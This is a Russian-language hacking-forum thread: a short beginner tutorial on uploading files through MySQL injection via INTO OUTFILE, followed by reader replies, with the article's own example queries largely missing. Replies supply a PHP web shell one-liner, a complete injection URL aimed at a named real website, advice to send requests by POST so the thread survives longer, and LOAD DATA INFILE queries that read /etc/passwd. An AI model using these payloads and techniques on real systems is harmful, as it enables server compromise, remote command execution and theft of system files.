Загрузка файл через mysql inj. [INTRO] Думаю будет полезно новичкам и тем у кого не было практики в этом вопросе. Статья узко направленная, поэтому маленькая по обьему. Побудило меня написать большое кол-во вопросов в icq. Тема Много где обсуждалась но нечего кроме теоритеческих данных не было сегодня мы полностью раскроем этот вопрос и протестим все на конкретном примере. [хек-хек] И так начнем. Наш подопытный: Есть SQL: Смотрим user() version() database() Версия 5 смотрим Какие таблицы есть. Тестовый вывод данных из бд. Проверяем на чтение файлов. C обходом фильтрации (Сдесь не требуеться.) Способ №1 Проверям на запись файла общий синтаксис такой: Записываем (Когда будете тестить надо указывать уникальное имя файла, если такой файл уже будет то запись не произайдет. должна вывестись ошибка Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource). Записываемый в файл текст мы кодируем в 0x+hex сделать это можно тут (http://hack-shop.org.ru/?page=6&ln=ru) Способ №2 Спсоб №3 Проверям записалось ли??? Записалось. Полный путь до www [PS] Видео урок можно скачать ТУТ Не стоит дефейсить сайт. Все данные предоставленные в статье предназначены только для ознакомления. С нетерпением жду коментов и вопросов. Спасибо за внимание. [ cash ] Hack-Shop.Org.Ru (c)
2Spyder Прочитай интро и покажи мне такую же статью ps иньекцию нашел не я, а Spyder но думаю не это главное...
Все хорошо, только еще стоит уточнить, что для проведения данной атаки у mysql юзера должны быть права на работу с файлами, что в последнее время практически нигде не встречается + при экранировании кавычек into outfile не работает. P.S. вижу что Слайдер просматривает тему, ща влепит минус за GET =))
Ну да ты прав. экранирование кавычек можно обходить Да не забываем посылать запросы post методом. а то тема долго не проживет. хотя видео снял
однотипная статья....таких в инете полно... [cash] ты пишешь дохрена статей, но все на низком уровне, копай глубже. То что здесь написано даже ламеры знают... into outfile это не единственный способ вывести инфу в файл..... По крайне мере я знаю 3 способа.... Оценка: 3- Тема сисек не раскрыта!
Описанное тут есть в каждой статье по mysql-inj. Хотелось бы узнать поподробнее про другие способы заливки шелла в mysql. Про into outfile + magic_quotes On тоже хотелось бы узнать
Если я не ошибаюсь into outfile ''-- работает именно на одинарных ковычках только вида ' но не `. А так в общем молодец, за труды респект ps и еще хочу добавить, основная задача ведь не в записи левой строчки в файл а в записи веб шелла <?php system($_GET[cmd]); ?> . Допустим ты создал файл shell.php c данной строчкой в /tmp, но ведь это самый минимум, самое простое. Основная задача пронклудить файл, что сложнее(конечто же если сайт не дырявый). Но может быть альтернатва, если ты раскрыл полный путь и нашел какуе то папочку с правами на запись тогда все проще намного.
2_Pantera_ ну потести на каком нить серве поставь себе mysql и phpmyadmin into outfile работает как `(%60) так и с ' (%27) кавычками с "(%22) не пробывал но по идее тоже должно работать. Посмотри внизу статьи полный путь до www зачем что то инлудить???
работает ' и " а ковычки ` не работают я проверял, а ' (%27) и "(%22) воспринимается браузером одинаково можешь сам потестить http://www.caduser.ru/acad/index.php?ver_id=1+union+select+1,'qqqqqqqq',3,4+from+mysql.user+into+outfile+"/tmp/file111.php"-- а инклудить надо для того что б шелл запустить, ведь он лижит не на сайте, а в /tmp ps попробуй на этом сайте проинклудить у меня не получилось если что стукне мне в аську или в пм
Посути это точно такой же способ, только в первом случае возможно добавление дополнительных символов в сохраняемый файл, которые просто так, к примеру, не получилось добавить, ну а второй, просто называется по другому, в любом случае, главного недостатка (неработаспособности при экранировании) они не лишены и отдельными способами заливки шела их выносить не стоит.
2andy13 наркоман? 2madnet Я не борюсь за звание супер хакера я делюсь своими знаниями с теми кто знает меньше меня. Я знаю недостаки этих спасобов и что написанно много статей я пытался только помочь тем кто разбираеться меньше, если вы считаете эту статью недостойной то просто удалите ее. Многие из AMA SM вообще нечего не пишут хотя античат думаю один из лучших he порталов со статьями. 2all Если кто то из вас может дополнить то напишите, а говорить что это уже все знают смысл?
2madnet: да, действительно, я имел в виду обход кавычек при чтении файлов. не обратил внимание. 2[ cash ]: нет
Если файл не удается прочитать можно попробовать его в таблицу запихнуть PHP: LOAD DATA INFILE '/etc/passwd' INTO TABLE hack.table FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n'LOAD DATA INFILE '/etc/passwd' INTO TABLE hack.table (colum1,column2) Если mysql ниже 3.2 то надо делать так PHP: LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE hack.table А использование INTO DUMPFILE вместо INTO OUTFILE делает дамп неразборчивым для чтения тк идет без ограничитей строк и стоблцов,это для BLOB данных.И кстати наиболее всего PHP: SELECT DATA INTO OUTFILE '/tmp/hack.txt' FIELDS TERMINATED BY ',' OPIONALLY ENCLODES BY '"' LINES TERMINATED BY '\n' FROM hack.table
интереснинькая статься - только сколько я не пробовал ети инекции всегда неполучалось в месте когда цыфры вводить нужно - поля не менялись - кто знает в чем трабла?